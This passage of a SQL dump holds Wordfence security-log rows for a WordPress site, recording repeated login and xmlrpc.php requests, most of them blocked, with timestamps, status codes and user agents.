rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11131,0.000000,1630752812.440875,'\0\0\0\0\0\0\0\0\0\0��� �A',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11132,0.000000,1630752997.546078,'\0\0\0\0\0\0\0\0\0\0��3���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11133,0.000000,1630753168.282723,'\0\0\0\0\0\0\0\0\0\0��o��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11134,0.000000,1630753416.360917,'\0\0\0\0\0\0\0\0\0\0��zrL�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11135,0.000000,1630753555.854452,'\0\0\0\0\0\0\0\0\0\0���5�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11136,0.000000,1630753765.763179,'\0\0\0\0\0\0\0\0\0\0��P��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11137,0.000000,1630753951.649549,'\0\0\0\0\0\0\0\0\0\0���ф',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11138,0.000000,1630754136.632244,'\0\0\0\0\0\0\0\0\0\0��-|T(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11139,0.000000,1630754347.317937,'\0\0\0\0\0\0\0\0\0\0����؛',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11140,0.000000,1630754744.384349,'\0\0\0\0\0\0\0\0\0\0��]r��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11141,0.000000,1630754926.155344,'\0\0\0\0\0\0\0\0\0\0���7�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11142,0.000000,1630755126.060840,'\0\0\0\0\0\0\0\0\0\0��P8',0,200,0,1,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(11143,0.000000,1630756409.488510,'\0\0\0\0\0\0\0\0\0\0��ʽ��',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11144,0.000000,1630756636.554528,'\0\0\0\0\0\0\0\0\0\0��e >�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11145,0.000000,1630756822.696450,'\0\0\0\0\0\0\0\0\0\0��n��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11146,0.000000,1630757040.538966,'\0\0\0\0\0\0\0\0\0\0����zX',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11147,0.000000,1630757236.931698,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11148,0.000000,1630757411.099615,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11149,0.000000,1630757632.925283,'\0\0\0\0\0\0\0\0\0\0��P��F',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11150,0.000000,1630757809.603000,'\0\0\0\0\0\0\0\0\0\0���u,?',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11151,0.000000,1630758010.770203,'\0\0\0\0\0\0\0\0\0\0����kQ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11152,0.000000,1630758199.555475,'\0\0\0\0\0\0\0\0\0\0��e%�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11153,0.000000,1630758424.812399,'\0\0\0\0\0\0\0\0\0\0��@[�L',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11154,0.000000,1630758495.814196,'\0\0\0\0\0\0\0\0\0\0���Z�w',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11155,0.000000,1630758620.983385,'\0\0\0\0\0\0\0\0\0\0���ww',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11156,0.000000,1630758826.820682,'\0\0\0\0\0\0\0\0\0\0����\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11157,0.000000,1630758997.955704,'\0\0\0\0\0\0\0\0\0\0���6x]',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11158,0.000000,1630759230.952246,'\0\0\0\0\0\0\0\0\0\0��go(',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11159,0.000000,1630759432.982882,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11160,0.000000,1630759609.647059,'\0\0\0\0\0\0\0\0\0\0����vH',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11161,0.000000,1630759846.965760,'\0\0\0\0\0\0\0\0\0\0��ms��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11162,0.000000,1630760051.032721,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11163,0.000000,1630760251.678149,'\0\0\0\0\0\0\0\0\0\0���[K	',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11164,0.000000,1630760461.174729,'\0\0\0\0\0\0\0\0\0\0���ࣶ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11165,0.000000,1630760609.298579,'\0\0\0\0\0\0\0\0\0\0��/i=#',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11166,0.000000,1630760659.376432,'\0\0\0\0\0\0\0\0\0\0���c]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11167,0.000000,1630760868.376621,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11168,0.000000,1630761086.585096,'\0\0\0\0\0\0\0\0\0\0���_nq',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11169,0.000000,1630761289.910293,'\0\0\0\0\0\0\0\0\0\0��P8',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11170,0.000000,1630761299.896084,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11171,0.000000,1630761685.276102,'\0\0\0\0\0\0\0\0\0\0����*J',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11172,0.000000,1630761897.797309,'\0\0\0\0\0\0\0\0\0\0��£�5',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11173,0.000000,1630762110.348895,'\0\0\0\0\0\0\0\0\0\0���j#�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11174,0.000000,1630762301.566875,'\0\0\0\0\0\0\0\0\0\0��k�i�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11175,0.000000,1630762515.866114,'\0\0\0\0\0\0\0\0\0\0����	g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11176,0.000000,1630762708.062304,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11177,0.000000,1630762730.024142,'\0\0\0\0\0\0\0\0\0\0��e�+',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11178,0.000000,1630762918.734345,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11179,0.000000,1630763130.692526,'\0\0\0\0\0\0\0\0\0\0��h�*d',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11180,0.000000,1630763370.615360,'\0\0\0\0\0\0\0\0\0\0��Bt�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11181,0.000000,1630763572.679782,'\0\0\0\0\0\0\0\0\0\0����d',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11182,0.000000,1630763797.830995,'\0\0\0\0\0\0\0\0\0\0���]�_',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11183,0.000000,1630763992.682307,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11184,1630764021.199092,1630764021.078600,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11185,0.000000,1630764030.856251,'\0\0\0\0\0\0\0\0\0\0����\"�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11186,0.000000,1630764237.259638,'\0\0\0\0\0\0\0\0\0\0��]qo�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11187,0.000000,1630764441.599295,'\0\0\0\0\0\0\0\0\0\0���>n�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11188,0.000000,1630764655.024662,'\0\0\0\0\0\0\0\0\0\0�����4',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11189,0.000000,1630764884.012001,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11190,0.000000,1630765087.229767,'\0\0\0\0\0\0\0\0\0\0��N�Q�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11191,0.000000,1630765308.829176,'\0\0\0\0\0\0\0\0\0\0����z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11192,0.000000,1630765522.273529,'\0\0\0\0\0\0\0\0\0\0���~�@',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11193,0.000000,1630765715.554081,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11194,0.000000,1630765930.937650,'\0\0\0\0\0\0\0\0\0\0��3��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11195,0.000000,1630766167.454624,'\0\0\0\0\0\0\0\0\0\0��gmш',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11196,0.000000,1630766401.468109,'\0\0\0\0\0\0\0\0\0\0��3Y��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11197,0.000000,1630766612.932936,'\0\0\0\0\0\0\0\0\0\0����7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11198,0.000000,1630766810.341171,'\0\0\0\0\0\0\0\0\0\0��-v�W',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11199,0.000000,1630766951.193568,'\0\0\0\0\0\0\0\0\0\0���1N',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11200,0.000000,1630767027.480855,'\0\0\0\0\0\0\0\0\0\0��|��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11201,0.000000,1630767268.172041,'\0\0\0\0\0\0\0\0\0\0��[��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11202,0.000000,1630767493.961775,'\0\0\0\0\0\0\0\0\0\0��@om�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11203,0.000000,1630767718.757067,'\0\0\0\0\0\0\0\0\0\0��\r^�,',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11204,0.000000,1630767933.296346,'\0\0\0\0\0\0\0\0\0\0����7',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11205,0.000000,1630768110.283905,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11206,0.000000,1630768144.981130,'\0\0\0\0\0\0\0\0\0\0���VM�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11207,0.000000,1630768359.055147,'\0\0\0\0\0\0\0\0\0\0���c�X',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11208,0.000000,1630768565.641349,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11209,0.000000,1630768799.696448,'\0\0\0\0\0\0\0\0\0\0����8�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11210,0.000000,1630769031.252953,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11211,0.000000,1630769067.025041,'\0\0\0\0\0\0\0\0\0\0���]�_',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11212,0.000000,1630769270.848291,'\0\0\0\0\0\0\0\0\0\0��o���',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11213,0.000000,1630769502.606505,'\0\0\0\0\0\0\0\0\0\0��\\̆�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11214,0.000000,1630769725.779466,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11215,0.000000,1630769952.125431,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11216,0.000000,1630770164.023544,'\0\0\0\0\0\0\0\0\0\0��k��\n',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11217,0.000000,1630770371.861783,'\0\0\0\0\0\0\0\0\0\0���ŃB',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11218,0.000000,1630770608.834692,'\0\0\0\0\0\0\0\0\0\0��aO�2',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11219,0.000000,1630770827.037847,'\0\0\0\0\0\0\0\0\0\0����	g',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11220,0.000000,1630771023.640190,'\0\0\0\0\0\0\0\0\0\0���cN�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11221,0.000000,1630771063.761972,'\0\0\0\0\0\0\0\0\0\0��k�<�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11222,0.000000,1630771177.694572,'\0\0\0\0\0\0\0\0\0\0��tK�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 